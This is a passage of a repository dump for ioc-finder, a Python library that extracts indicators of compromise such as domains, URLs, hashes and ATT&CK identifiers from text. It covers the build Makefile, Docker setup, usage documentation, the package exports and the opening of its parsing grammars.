| define BROWSER_PYSCRIPT 4 | import os, webbrowser, sys 5 | try: 6 | from urllib import pathname2url 7 | except: 8 | from urllib.request import pathname2url 9 | 10 | webbrowser.open("file://" + pathname2url(os.path.abspath(sys.argv[1]))) 11 | endef 12 | export BROWSER_PYSCRIPT 13 | 14 | define PRINT_HELP_PYSCRIPT 15 | import re, sys 16 | 17 | for line in sys.stdin: 18 | match = re.match(r'^([a-zA-Z_-]+):.*?## (.*)$$', line) 19 | if match: 20 | target, help = match.groups() 21 | print("%-20s %s" % (target, help)) 22 | endef 23 | export PRINT_HELP_PYSCRIPT 24 | BROWSER := python -c "$$BROWSER_PYSCRIPT" 25 | 26 | help: 27 | @python -c "$$PRINT_HELP_PYSCRIPT" < $(MAKEFILE_LIST) 28 | 29 | clean: clean-build clean-pyc clean-test ## remove all build, test, coverage and Python artifacts 30 | 31 | 32 | clean-build: ## remove build artifacts 33 | rm -fr build/ 34 | rm -fr dist/ 35 | rm -fr .eggs/ 36 | find . -name '*.egg-info' -exec rm -fr {} + 37 | find . -name '*.egg' -exec rm -f {} + 38 | 39 | clean-pyc: ## remove Python file artifacts 40 | find . -name '*.pyc' -exec rm -f {} + 41 | find . -name '*.pyo' -exec rm -f {} + 42 | find . -name '*~' -exec rm -f {} + 43 | find . 
-name '__pycache__' -exec rm -fr {} + 44 | 45 | clean-test: ## remove test and coverage artifacts 46 | rm -fr .tox/ 47 | rm -f .coverage 48 | rm -fr htmlcov/ 49 | 50 | lint: ## check style with flake8 51 | flake8 ioc_finder tests 52 | 53 | test: ## run tests quickly with the default Python 54 | py.test 55 | 56 | 57 | test-all: ## run tests on every Python version with tox 58 | tox 59 | 60 | coverage: ## check code coverage quickly with the default Python 61 | coverage run --source ioc_finder -m pytest 62 | 63 | coverage report -m 64 | coverage html 65 | $(BROWSER) htmlcov/index.html 66 | 67 | docs: ## generate Sphinx HTML documentation, including API docs 68 | rm -f docs/ioc_finder.rst 69 | rm -f docs/modules.rst 70 | sphinx-apidoc -o docs/ ioc_finder 71 | $(MAKE) -C docs clean 72 | $(MAKE) -C docs html 73 | $(BROWSER) docs/_build/html/index.html 74 | 75 | servedocs: docs ## compile the docs watching for changes 76 | watchmedo shell-command -p '*.rst' -c '$(MAKE) -C docs html' -R -D . 77 | 78 | release: clean ## package and upload a release 79 | python setup.py sdist upload 80 | python setup.py bdist_wheel upload 81 | 82 | dist: clean ## builds source and wheel package 83 | python setup.py sdist 84 | python setup.py bdist_wheel 85 | ls -l dist 86 | 87 | install: clean ## install the package to the active Python's site-packages 88 | python setup.py install 89 | 90 | upstream: ## set the upstream for the repository 91 | git remote set-upstream https://github.com/fhightower/ioc-finder.git 92 | 93 | init: ## install the development requirements with pip (related to python2.x) 94 | pip install -r requirements_dev.txt 95 | 96 | init3: ## install the development requirements with pip3 (related to python3.x) 97 | pip3 install -r requirements_dev.txt 98 | 99 | pypi: clean ## upload the code to pypi 100 | python3 setup.py sdist bdist_wheel 101 | python3 -m twine upload dist/* 102 | -------------------------------------------------------------------------------- /README.md: 
-------------------------------------------------------------------------------- 1 | # IOC Finder 2 | 3 | [![PyPi](https://img.shields.io/pypi/v/ioc_finder.svg)](https://pypi.python.org/pypi/ioc_finder) 4 | ![PyPI - Downloads](https://img.shields.io/pypi/dm/ioc-finder) 5 | [![CI](https://github.com/fhightower/ioc-finder/workflows/CI/badge.svg)](https://github.com/fhightower/ioc-finder/actions) 6 | [![Lint](https://github.com/fhightower/ioc-finder/workflows/Lint/badge.svg)](https://github.com/fhightower/ioc-finder/actions) 7 | [![codecov](https://codecov.io/gh/fhightower/ioc-finder/branch/master/graph/badge.svg)](https://codecov.io/gh/fhightower/ioc-finder) 8 | [![License: LGPL v3](https://img.shields.io/badge/License-LGPL%20v3-blue.svg)](https://choosealicense.com/licenses/lgpl-3.0/) 9 | [![live demo](https://img.shields.io/badge/live%20demo-%E2%86%92-green)](https://hightower.space/ioc-finder/) 10 | 11 | Parse [indicators of compromise](https://searchsecurity.techtarget.com/definition/Indicators-of-Compromise-IOC) (also known as "observables" or "network data" - e.g. urls, email addresses, etc) from text. 12 | 13 | 📖 [Documentation](https://hightower.space/ioc-finder) (it's interactive!) 14 | 15 | 💪 I'm looking for [sponsorship](https://github.com/sponsors/fhightower) for this project. 16 | I have a number of improvements and helpful features I'd like to add and would appreciate some support as I invest this time and focus. 17 | If you use this project in a commercial capacity and/or find it useful, please consider [contributing](https://github.com/sponsors/fhightower) even a small amount. Thanks! 18 | 19 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.4' 2 | 3 | services: 4 | _base: 5 | &base 6 | build: 7 | dockerfile: Dockerfile 8 | context: . 
9 | volumes: 10 | - ./:/code 11 | - ~/.gitconfig:/root/.gitconfig 12 | 13 | dev: 14 | <<: *base 15 | command: ipython 16 | 17 | mkdocs: 18 | <<: *base 19 | entrypoint: "mkdocs" 20 | ports: 21 | - "8000:8000" 22 | command: ["serve", "--dev-addr=0.0.0.0:8000"] 23 | 24 | bump-patch: 25 | <<: *base 26 | command: bumpversion patch 27 | 28 | bump-minor: 29 | <<: *base 30 | command: bumpversion minor 31 | 32 | bump-major: 33 | <<: *base 34 | command: bumpversion major 35 | 36 | test: 37 | <<: *base 38 | command: pytest 39 | 40 | test-benchmarks: 41 | <<: *base 42 | # the `-c "."` prevents pytest from using the config specified in the pyproject.toml (which we don't want to use for benchmarks) 43 | command: pytest -c "." --benchmark-storage=.benchmarks/Linux-CPython-3.10-64bit/ --benchmark-compare=0001 --benchmark-compare-fail=mean:10% --benchmark-columns='mean,median,stddev,iqr' tests/benchmarks.py 44 | 45 | update-benchmarks: 46 | <<: *base 47 | command: > 48 | bash -c " 49 | pytest -c '.' --benchmark-storage=.benchmarks/ --benchmark-save=benchmark tests/benchmarks.py && 50 | mv .benchmarks/Linux-CPython-3.10-64bit/0002_benchmark.json .benchmarks/Linux-CPython-3.10-64bit/0001_benchmark.json" 51 | 52 | lint: 53 | <<: *base 54 | entrypoint: ./docker/lint.sh 55 | environment: 56 | # this is used in ./docker/lint.sh to determine whether or not the lint step should fail if there files were... 57 | # changed by black/isort. You can change this value to "ci" to test how the lint step will run in... 58 | # the ci pipeline. 59 | CONTEXT: local 60 | -------------------------------------------------------------------------------- /docker/lint.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | set -euxo pipefail 4 | 5 | echo "Running linters and formatters..." 
6 | 7 | isort ioc_finder/ tests/ 8 | 9 | black ioc_finder/ tests/ 10 | 11 | # if the CONTEXT env var is "ci" (which is set in .github/workflows/lint.yml), validate that none of the files 12 | # have been changed by the previous lint steps 13 | if [ "${CONTEXT:-local}" = "ci" ]; then 14 | (git status | grep "nothing to commit") || { echo "Lint steps have changed files"; exit 1; }; 15 | fi 16 | 17 | mypy ioc_finder/ tests/ 18 | 19 | pylint --fail-under 9 ioc_finder/*.py 20 | 21 | flake8 ioc_finder/ 22 | 23 | echo "Done ✨ 🎉 ✨" 24 | 25 | -------------------------------------------------------------------------------- /docs/development.md: -------------------------------------------------------------------------------- 1 | # Development Guide 🐳 2 | 3 | This page shows you how to test, lint, and explore the ioc-finder. 4 | As always, if you have feedback, please [raise an issue](https://github.com/fhightower/ioc-finder/issues/new) and we'll be happy 5 | to improve our docs. Thanks! 6 | 7 | ## Prerequisites 8 | 9 | If you want to test, lint, or explore ioc-finder, make sure you have [docker][docker] and [docker-compose][docker-compose] installed (if you don't see: [installing docker][docker-install]). 10 | 11 | Then you can use the `test`, `lint`, and `dev` docker compose services listed below! 12 | 13 | ## Test ioc-finder 🧪 14 | 15 | To test ioc-finder, run the following command from the root directory of the project: 16 | 17 | ```shell 18 | docker-compose run --rm test 19 | ``` 20 | 21 | Typically, this command will run [pytest][pytest-link] on the project's test suite. To view the details of what this command does, take a look at the `test` service in the project's `docker-compose.yml` file. 22 | 23 | ### Understanding our Testing Framework 24 | 25 | There are two types of tests in the `ioc-finder/tests/` directory: 26 | 27 | 1. Standard tests in test_*.py files 28 | 2. 
Tests run by `ioc-finder/tests/test_find_iocs.py` 29 | 30 | In this section of the documentation, we'll discuss the second set of tests (those run by `ioc-finder/tests/test_find_iocs.py`). 31 | 32 | In the `ioc-finder/tests/find_iocs_cases` dir, there are files which define test cases with an input and expected output for different types of observables (a.k.a. indicators). 33 | 34 | A test case is a [`pytest.param`](https://docs.pytest.org/en/stable/reference/reference.html?highlight=The%20id%20to%20attribute%20to%20this%20parameter%20set#pytest.param) object 35 | that takes these arguments: 36 | 37 | - The input to the `ioc_finder.find_iocs` function (a string) 38 | - The expected output from the `ioc_finder.find_iocs` function (a dict) 39 | - (*Optional*) Kwargs for the `ioc_finder.find_iocs` function (a dict) 40 | - The `id` kwarg providing a name for the test (a string) 41 | 42 | An example looks like: 43 | 44 | ```python 45 | from pytest import param 46 | 47 | param('as1234', {'asns': ['ASN1234']}, {}, id="asn_1") 48 | ``` 49 | 50 | `ioc-finder/tests/test_find_iocs.py` collects data from the `ioc-finder/tests/find_iocs_cases/` dir and runs tests to make sure the `find_iocs` function returns the expected data. 51 | 52 | ## Lint ioc-finder 🧹 53 | 54 | To lint ioc-finder, run the following command from the root directory of the project: 55 | 56 | ```shell 57 | docker-compose run --rm lint 58 | ``` 59 | 60 | Typically, this command will run a number of linters on the project's code with the goal of improving code quality and catching bugs before they are released (you can read more about the benefits of linting [here][linting-intro]). To view the details of what this command does, take a look at the `lint` service in the project's `docker-compose.yml` file. 61 | 62 | ## Explore ioc-finder 🔭 63 | 64 | To explore ioc-finder, you can drop into a "dev" environment which is an [IPython][ipython] shell with the project and all its requirements loaded. 
To do this, run the following command from the root directory of the project: 65 | 66 | ```shell 67 | docker-compose run --rm dev 68 | ``` 69 | 70 | To see what this command does, take a look at the `dev` service in the project's `docker-compose.yml` file. 71 | 72 | ## Run Docs Locally 📖 73 | 74 | To view the docs for ioc-finder locally, run the following command from the root directory of the project: 75 | 76 | ```shell 77 | docker-compose run --rm mkdocs 78 | ``` 79 | 80 | This will serve the documentation at `http://localhost:8000`. 81 | 82 | # Questions? Please Ask! 83 | 84 | If you have any follow-up questions, don't hesitate to ask! It takes practice to understand how to contribute to open-source software, so there is no shame in asking for help. 85 | 86 | [pytest-link]: https://docs.pytest.org/en/stable/ 87 | [docker-compose]: https://docs.docker.com/compose/ 88 | [docker-install]: https://docs.docker.com/get-docker/ 89 | [docker]: https://www.docker.com/get-started 90 | [linting-intro]: https://dbader.org/blog/python-code-linting 91 | [ipython]: https://ipython.org/ 92 | 93 | -------------------------------------------------------------------------------- /docs/index.md: -------------------------------------------------------------------------------- 1 | # IOC Finder 2 | 3 | [![PyPi](https://img.shields.io/pypi/v/ioc_finder.svg)](https://pypi.python.org/pypi/ioc_finder) 4 | ![PyPI - Downloads](https://img.shields.io/pypi/dm/ioc-finder) 5 | [![CI](https://github.com/fhightower/ioc-finder/workflows/CI/badge.svg)](https://github.com/fhightower/ioc-finder/actions) 6 | [![Lint](https://github.com/fhightower/ioc-finder/workflows/Lint/badge.svg)](https://github.com/fhightower/ioc-finder/actions) 7 | [![codecov](https://codecov.io/gh/fhightower/ioc-finder/branch/master/graph/badge.svg)](https://codecov.io/gh/fhightower/ioc-finder) 8 | [![License: LGPL v3](https://img.shields.io/badge/License-LGPL%20v3-blue.svg)](https://choosealicense.com/licenses/lgpl-3.0/) 9 | 10 
| Welcome to the documentation for the `ioc-finder` library - a library to find different types of [indicators of compromise](https://digitalguardian.com/blog/what-are-indicators-compromise) (a.k.a observables) and data pertinent to indicators of compromise! 11 | 12 | 📢 *Announcement*: I'm looking for [sponsorship](https://github.com/sponsors/fhightower) for this project. I have a number of improvements and helpful features I'd like to add, but need some support to continue working on this project. If you use this project for work and/or find it useful, please consider [contributing](https://github.com/sponsors/fhightower) even a small amount. Thanks! 13 | 14 | ### Quick-Start 15 | 16 | Install ioc-finder: 17 | 18 | ```shell 19 | pip install ioc-finder 20 | ``` 21 | 22 | Use it: 23 | 24 | ```python 25 | from ioc_finder import find_iocs 26 | 27 | text = "" 28 | 29 | iocs = find_iocs(text) 30 | iocs['domains'] 31 | iocs['urls'] 32 | ``` 33 | 34 | ## Overview (INTERACTIVE!) 35 | 36 | Enter some text with IOCs here and click "Parse IOCs" to see how ioc-finder parses IOCs. Click "Reload" 37 | 38 | 41 | 42 | 43 |
44 |

 45 | 
 46 | The code above uses [Pyodide](https://pyodide.org/en/stable/index.html) to provide a Python3.9 runtime in the browser using [WebAssembly](https://webassembly.org/). Enjoy!
 47 | 
 48 | ## Capabilities
 49 | 
 50 | ??? info "Data types found by ioc-finder"
 51 | 
 52 |     - Autonomous System Numbers (ASNs) (in multiple formats such as `asn1234` and `as 1234`)
 53 |     - Bitcoin addresses (P2PKH, P2SH, and Bech32)
 54 |     - CIDR ranges (currently ipv4 ranges; ipv6 ranges coming soon)
 55 |     - CVEs (e.g. `CVE-2014-1234`)
 56 |     - Domain names (support for Unicode domain names (e.g. `ȩxample.com`) is coming soon)
 57 |     - Email addresses (both standard format (e.g. `test@example.com`) and an email with an IP address as the domain (e.g. `test@[192.168.0.1]`))
 58 |     - File hashes (md5, sha1, sha256, sha512, [import hashes](https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html), and [authentihashes](http://msdn.microsoft.com/en-us/library/windows/hardware/gg463180.aspx))
 59 |     - File paths (*beta*)
 60 |     - Google Adsense Publisher IDs
 61 |     - Google Analytics Tracker IDs
 62 |     - IP addresses (IPv4 and IPv6)
 63 |     - MAC addresses (*beta*)
 64 |     - Monero (crypto-currency) addresses
 65 |     - Registry key paths (e.g. `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows`)
 66 |     - SSDeep hashes (*beta*)
 67 |     - URLs (URLs with and without schemes)
 68 |     - User agents (*beta*)
 69 |     - XMPP addresses (basically, this captures email addresses whose domain names contain "jabber" or "xmpp")
 70 |     - MITRE ATT&CK data (see [more info](https://attack.mitre.org/))\*:
 71 |         - Pre-attack tactics and techniques (and [sub-techniques](https://medium.com/mitre-attack/attack-subs-what-you-need-to-know-99bce414ae0b))
 72 |         - Enterprise mitigations, tactics, and techniques (and [sub-techniques](https://medium.com/mitre-attack/attack-subs-what-you-need-to-know-99bce414ae0b))
 73 |         - Mobile mitigations, tactics, and techniques (and [sub-techniques](https://medium.com/mitre-attack/attack-subs-what-you-need-to-know-99bce414ae0b))
 74 |     - [TLP labels](https://www.us-cert.gov/tlp)
 75 | 
 76 |     Have another data-type you would like ioc-finder to parse? [Raise an issue][issues_link] and we'll see what we can do!
 77 | 
 78 | ??? info "Configuration Options"
 79 | 
 80 |     This library also provides options to:
 81 | 
 82 |     - Parse domain name from a URL
 83 |     - Parse domain name from an email address
 84 |     - Parse IP address from a CIDR range
 85 |     - Parse URLs without a scheme (e.g. without `https://`)
 86 |     - Parse [import hashes](https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html) and [authentihashes](http://msdn.microsoft.com/en-us/library/windows/hardware/gg463180.aspx)
 87 | 
 88 | ??? info "Known Limitations"
 89 | 
 90 |     - When parsing **registry key paths**, this library will NOT properly parse a registry key path where the last section contains a space. For example, `\software\microsoft\windows\currentversion\explorer\advanced on` will be parsed as `\software\microsoft\windows\currentversion\explorer\advanced` (the final section is truncated at the space, so ` on` is dropped).
 91 |     - The items listed above (in the "Capabilities" section) that are followed by "(*beta*)" are not very robust and may still have major issues. Any feedback or issues related to these items are much appreciated.
 92 |     - When parsing **markdown**, if there is a domain name that is surrounded by underscores (which would make the domain name italic in some flavours of markdown - e.g. `_google.com_`), the domain will be parsed *including* the leading underscore (e.g. `_google.com_` would be parsed as `_google.com`).
 93 | 
 94 | ## Feedback
 95 | 
 96 | If you have any ideas to improve this package, please [raise an issue][issues_link]!
 97 | 
 98 | ## Other Helpful Projects
 99 | 
100 | You may also be interested in [https://github.com/ioc-fang/ioc_fanger](https://github.com/ioc-fang/ioc_fanger), a project to fang and defang indicators of compromise. For example,
101 | 
102 | defanging:
103 | 
104 | ```
105 | example.com => example[.]com
106 | https://example.com => hXXps://example[.]com
107 | ```
108 | 
109 | and fanging:
110 | 
111 | ```
112 | example[.]com => example.com
113 | example(.)com => example.com
114 | me AT example(.)com => me@example.com
115 | ```
116 | 
117 | ## Credits
118 | 
119 | This project uses the [ioc_fanger](https://github.com/ioc-fang/ioc_fanger) package to make sure that all indicators in the text are properly [fanged](https://ioc-fanger.hightower.space/).
120 | 
121 | This package was created with [Cookiecutter](https://github.com/audreyr/cookiecutter) and Floyd Hightower's [python-project-template](https://github.com/fhightower-templates/python-project-template) project template.
122 | 
123 | [issues_link]: https://github.com/fhightower/ioc-finder/issues
124 | 
125 | \* MITRE data is © 2021 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. (View the MITRE data's [full license](https://github.com/mitre/cti/blob/master/LICENSE.txt))
126 | 


--------------------------------------------------------------------------------
/docs/overrides/main.html:
--------------------------------------------------------------------------------
 1 | {% extends "base.html" %}
 2 | 
 3 | {% block libs %}
 4 |     {{ super() }}
 5 | 
 6 |     
12 | 
13 |     
14 | 
15 |     
65 | {% endblock %}
66 | 


--------------------------------------------------------------------------------
/docs/quick-start.md:
--------------------------------------------------------------------------------
  1 | ## Installation
  2 | 
  3 | The recommended means of installation is using [pip](https://pypi.python.org/pypi/pip/):
  4 | 
  5 | `pip install ioc-finder`
  6 | 
  7 | Alternatively, you can install ioc-finder as follows:
  8 | 
  9 | ```shell
 10 | git clone git@github.com:fhightower/ioc-finder.git && cd ioc-finder;
 11 | python setup.py install --user;
 12 | ```
 13 | 
 14 | ## Usage
 15 | 
 16 | This package can be used in [python](#python) or via a [command-line interface](#command-line-interface).
 17 | 
 18 | ### Python
 19 | 
 20 | The primary function in this package is the `ioc_finder.find_iocs()` function. A simple usage looks like:
 21 | 
 22 | ```python
 23 | from ioc_finder import find_iocs
 24 | 
 25 | text = "This is just an example.com https://example.org/test/bingo.php"
 26 | iocs = find_iocs(text)
 27 | 
 28 | print('Domains: {}'.format(iocs['domains']))
 29 | print('URLs: {}'.format(iocs['urls']))
 30 | ```
 31 | 
 32 | #### Inputs
 33 | 
 34 | You must pass some text into the `find_iocs()` function as a string (the iocs will be parsed from this text). You can also provide the options detailed below.
 35 | 
 36 | ##### Options
 37 | 
 38 | The `find_iocs` function takes the following keyword arguments (all of them default to `True`):
 39 | 
 40 | - `parse_domain_from_url` (default=True): Whether or not to parse domain names from URLs (e.g. `example.com` from `https://example.com/test`)
 41 | - `parse_from_url_path` (default=True): Whether or not to parse observables from URL paths (e.g. `2f3ec0e4998909bb0efab13c82d30708ca9f88679e42b75ef13ea0466951d862` from `https://www.virustotal.com/gui/file/2f3ec0e4998909bb0efab13c82d30708ca9f88679e42b75ef13ea0466951d862/detection`)
 42 | - `parse_domain_from_email_address` (default=True): Whether or not to parse domain names from email addresses (e.g. `example.com` from `foo@example.com`)
 43 | - `parse_address_from_cidr` (default=True): Whether or not to parse IP addresses from CIDR ranges (e.g. `0.0.0.1` from `0.0.0.1/24`)
 44 | - `parse_urls_without_scheme` (default=True): Whether or not to parse URLs without a scheme (see [https://en.wikipedia.org/wiki/Uniform_Resource_Identifier#Generic_syntax](https://en.wikipedia.org/wiki/Uniform_Resource_Identifier#Generic_syntax)) (e.g. `hightower.space/projects`)
 45 | - `parse_imphashes` (default=True): Parse [import hashes](https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html) (which look like md5s, but are preceded by 'imphash' or 'import hash')
 46 | - `parse_authentihashes` (default=True): Parse [authentihashes](http://msdn.microsoft.com/en-us/library/windows/hardware/gg463180.aspx) (which look like sha256s, but are preceded with 'authentihash')
 47 | 
 48 | See [test_ioc_finder.py](https://github.com/fhightower/ioc-finder/blob/master/tests/test_ioc_finder.py) for more examples.
 49 | 
 50 | #### Output
 51 | 
 52 | The `find_iocs()` function returns a dictionary with the following structure:
 53 | 
 54 | ```json
 55 | {
 56 |     "asns": [],
 57 |     "attack_mitigations": {
 58 |         "enterprise": [],
 59 |         "mobile": []
 60 |     },
 61 |     "attack_tactics": {
 62 |         "enterprise": [],
 63 |         "mobile": [],
 64 |         "pre_attack": []
 65 |     },
 66 |     "attack_techniques": {
 67 |         "enterprise": [],
 68 |         "mobile": [],
 69 |         "pre_attack": []
 70 |     },
 71 |     "authentihashes": [],
 72 |     "bitcoin_addresses": [],
 73 |     "cves": [],
 74 |     "domains": [],
 75 |     "email_addresses": [],
 76 |     "email_addresses_complete": [],
 77 |     "file_paths": [],
 78 |     "google_adsense_publisher_ids": [],
 79 |     "google_analytics_tracker_ids": [],
 80 |     "imphashes": [],
 81 |     "ipv4_cidrs": [],
 82 |     "ipv4s": [],
 83 |     "ipv6s": [],
 84 |     "mac_addresses": [],
 85 |     "md5s": [],
 86 |     "monero_addresses": [],
 87 |     "registry_key_paths": [],
 88 |     "sha1s": [],
 89 |     "sha256s": [],
 90 |     "sha512s": [],
 91 |     "ssdeeps": [],
 92 |     "tlp_labels": [],
 93 |     "urls": [],
 94 |     "user_agents": [],
 95 |     "xmpp_addresses": []
 96 | }
 97 | 
 98 | ```
 99 | 
100 | For example, running the example code shown at the start of the [usage](#usage) section above produces the following output:
101 | 
102 | ```json
103 | {
104 |     "asns": [],
105 |     "attack_mitigations": {
106 |         "enterprise": [],
107 |         "mobile": []
108 |     },
109 |     "attack_tactics": {
110 |         "enterprise": [],
111 |         "mobile": [],
112 |         "pre_attack": []
113 |     },
114 |     "attack_techniques": {
115 |         "enterprise": [],
116 |         "mobile": [],
117 |         "pre_attack": []
118 |     },
119 |     "authentihashes": [],
120 |     "bitcoin_addresses": [],
121 |     "cves": [],
122 |     "domains": ["example.org", "example.com"],
123 |     "email_addresses": [],
124 |     "email_addresses_complete": [],
125 |     "file_paths": [],
126 |     "google_adsense_publisher_ids": [],
127 |     "google_analytics_tracker_ids": [],
128 |     "imphashes": [],
129 |     "ipv4_cidrs": [],
130 |     "ipv4s": [],
131 |     "ipv6s": [],
132 |     "mac_addresses": [],
133 |     "md5s": [],
134 |     "monero_addresses": [],
135 |     "registry_key_paths": [],
136 |     "sha1s": [],
137 |     "sha256s": [],
138 |     "sha512s": [],
139 |     "ssdeeps": [],
140 |     "tlp_labels": [],
141 |     "urls": ["https://example.org/test/bingo.php"],
142 |     "user_agents": [],
143 |     "xmpp_addresses": []
144 | }
145 | ```
146 | 
147 | ##### Output Details
148 | 
149 | There are two grammars for email addresses. There is a fairly complete grammar to find email addresses matching the spec (which is very broad). Any of these complete email addresses (e.g. `foo"bar@gmail.com`) will be output in the `email_addresses_complete` key.
150 | 
151 | Email addresses in the simple form we are familiar with (e.g. `bar@gmail.com`) will be sent as output in the `email_addresses` key.
152 | 
153 | ### Parsing Specific Indicator Types
154 | 
155 | If you need to parse a specific indicator type, you can do this using one of the parse functions that start with `parse_`. For example, the code below will parse URLs:
156 | 
157 | ```python
158 | from ioc_finder import parse_urls, prepare_text
159 | 
160 | text = 'https://google.com'
161 | results = parse_urls(prepare_text(text))
162 | print(results)
163 | ```
164 | 
165 | If you use a parse function for a specific indicator type, we recommend that you first call the `prepare_text` function which [fangs](https://ioc-fanger.hightower.space/) (e.g. `hXXps://example[.]com` => `https://example.com`) the text before parsing indicators from it. In the future, more functionality will be added to the `prepare_text` function making it advantageous to call this function before parsing indicators.
166 | 
167 | ### Command-Line Interface
168 | 
169 | The ioc-finder package can be used from a command line like:
170 | 
171 | ```
172 | ioc-finder "This is just an example.com https://example.org/test/bingo.php"
173 | ```
174 | 
175 | This will return:
176 | 
177 | ```json
178 | {
179 |     "asns": [],
180 |     "attack_mitigations": {
181 |         "enterprise": [],
182 |         "mobile": []
183 |     },
184 |     "attack_tactics": {
185 |         "enterprise": [],
186 |         "mobile": [],
187 |         "pre_attack": []
188 |     },
189 |     "attack_techniques": {
190 |         "enterprise": [],
191 |         "mobile": [],
192 |         "pre_attack": []
193 |     },
194 |     "authentihashes": [],
195 |     "bitcoin_addresses": [],
196 |     "cves": [],
197 |     "domains": [
198 |         "example.com",
199 |         "example.org"
200 |     ],
201 |     "email_addresses": [],
202 |     "email_addresses_complete": [],
203 |     "file_paths": [],
204 |     "google_adsense_publisher_ids": [],
205 |     "google_analytics_tracker_ids": [],
206 |     "imphashes": [],
207 |     "ipv4_cidrs": [],
208 |     "ipv4s": [],
209 |     "ipv6s": [],
210 |     "mac_addresses": [],
211 |     "md5s": [],
212 |     "monero_addresses": [],
213 |     "registry_key_paths": [],
214 |     "sha1s": [],
215 |     "sha256s": [],
216 |     "sha512s": [],
217 |     "ssdeeps": [],
218 |     "tlp_labels": [],
219 |     "urls": [
220 |         "https://example.org/test/bingo.php"
221 |     ],
222 |     "user_agents": [],
223 |     "xmpp_addresses": []
224 | }
225 | ```
226 | 
227 | Here are the usage instructions for the CLI:
228 | 
229 | ```
230 | Usage: ioc-finder [OPTIONS] TEXT
231 | 
232 |   CLI interface for parsing indicators of compromise.
233 | 
234 | Options:
235 |   --no_url_domain_parsing         Using this flag will not parse domain names
236 |                                   from URLs
237 |   --no_email_addr_domain_parsing  Using this flag will not parse domain names
238 |                                   from email addresses
239 |   --no_cidr_address_parsing       Using this flag will not parse IP addresses
240 |                                   from CIDR ranges
241 |   --no_xmpp_addr_domain_parsing   Using this flag will not parse domain names
242 |                                   from XMPP addresses
243 |   --help                          Show this message and exit.
244 | ```
245 | 


--------------------------------------------------------------------------------
/ioc_finder/__init__.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | from .ioc_finder import (
 4 |     find_iocs,
 5 |     parse_asns,
 6 |     parse_authentihashes_,
 7 |     parse_bitcoin_addresses,
 8 |     parse_complete_email_addresses,
 9 |     parse_cves,
10 |     parse_domain_names,
11 |     parse_email_addresses,
12 |     parse_enterprise_attack_tactics,
13 |     parse_enterprise_attack_techniques,
14 |     parse_file_paths,
15 |     parse_google_adsense_ids,
16 |     parse_google_analytics_ids,
17 |     parse_imphashes_,
18 |     parse_ipv4_addresses,
19 |     parse_ipv4_cidrs,
20 |     parse_ipv6_addresses,
21 |     parse_mac_addresses,
22 |     parse_md5s,
23 |     parse_mobile_attack_tactics,
24 |     parse_mobile_attack_techniques,
25 |     parse_pre_attack_tactics,
26 |     parse_pre_attack_techniques,
27 |     parse_registry_key_paths,
28 |     parse_sha1s,
29 |     parse_sha256s,
30 |     parse_sha512s,
31 |     parse_ssdeeps,
32 |     parse_tlp_labels,
33 |     parse_urls,
34 |     parse_user_agents,
35 |     parse_xmpp_addresses,
36 |     prepare_text,
37 | )
38 | 
39 | __all__ = [  # public API: exactly the names imported from .ioc_finder in this module
40 |     "find_iocs",
41 |     "parse_asns",
42 |     "parse_authentihashes_",
43 |     "parse_bitcoin_addresses",
44 |     "parse_complete_email_addresses",
45 |     "parse_cves",
46 |     "parse_domain_names",
47 |     "parse_email_addresses",
48 |     "parse_enterprise_attack_tactics",
49 |     "parse_enterprise_attack_techniques",
50 |     "parse_file_paths",
51 |     "parse_google_adsense_ids",
52 |     "parse_google_analytics_ids",
53 |     "parse_imphashes_",
54 |     "parse_ipv4_addresses",
55 |     "parse_ipv4_cidrs",
56 |     "parse_ipv6_addresses",
57 |     "parse_mac_addresses",
58 |     "parse_md5s",
59 |     "parse_mobile_attack_tactics",
60 |     "parse_mobile_attack_techniques",
61 |     "parse_pre_attack_tactics",
62 |     "parse_pre_attack_techniques",
63 |     "parse_registry_key_paths",
64 |     "parse_sha1s",
65 |     "parse_sha256s",
66 |     "parse_sha512s",
67 |     "parse_ssdeeps",
68 |     "parse_tlp_labels",
69 |     "parse_urls",
70 |     "parse_user_agents",
71 |     "parse_xmpp_addresses",
72 |     "prepare_text",
73 | ]
74 | 
75 | __author__ = """Floyd Hightower"""
76 | __version__ = "7.3.0"
77 | 


--------------------------------------------------------------------------------
/ioc_finder/ioc_grammars.py:
--------------------------------------------------------------------------------
  1 | import copy
  2 | import re
  3 | 
  4 | from pyparsing import (
  5 |     CaselessLiteral,
  6 |     Char,
  7 |     Combine,
  8 |     Empty,
  9 |     FollowedBy,
 10 |     Literal,
 11 |     MatchFirst,
 12 |     NotAny,
 13 |     OneOrMore,
 14 |     Optional,
 15 |     Or,
 16 |     Regex,
 17 |     Word,
 18 |     WordEnd,
 19 |     WordStart,
 20 |     ZeroOrMore,
 21 |     alphanums,
 22 |     alphas,
 23 |     hexnums,
 24 |     nums,
 25 |     one_of,
 26 |     printables,
 27 |     pyparsing_common,
 28 |     replace_with,
 29 | )
 30 | 
 31 | from ioc_finder.data import (
 32 |     enterprise_attack_mitigations,
 33 |     enterprise_attack_tactics,
 34 |     enterprise_attack_techniques,
 35 |     mobile_attack_mitigations,
 36 |     mobile_attack_tactics,
 37 |     mobile_attack_techniques,
 38 |     pre_attack_tactics,
 39 |     pre_attack_techniques,
 40 |     schemes,
 41 |     tlds,
 42 | )
 43 | 
 44 | alphanum_word_start = WordStart(wordChars=alphanums)
 45 | alphanum_word_end = WordEnd(wordChars=alphanums)
 46 | 
 47 | # the label definition ignores the fact that labels should not end in a hyphen
 48 | label = Word(initChars=alphanums + "_", bodyChars=alphanums + "-_", max=63)
 49 | domain_tld = one_of(tlds, caseless=True)
 50 | domain_name = (
 51 |     alphanum_word_start
 52 |     + Combine(
 53 |         Combine(OneOrMore(label + ("." + FollowedBy(Word(alphanums + "-_")))))("domain_labels") + domain_tld("tld")
 54 |     )
 55 |     + alphanum_word_end
 56 | ).set_parse_action(pyparsing_common.downcase_tokens)
 57 | 
 58 | ipv4_section = (
 59 |     Word(nums, asKeyword=True, max=3)
 60 |     .set_parse_action(lambda x: str(int(x[0])))
 61 |     .addCondition(lambda tokens: int(tokens[0]) < 256)
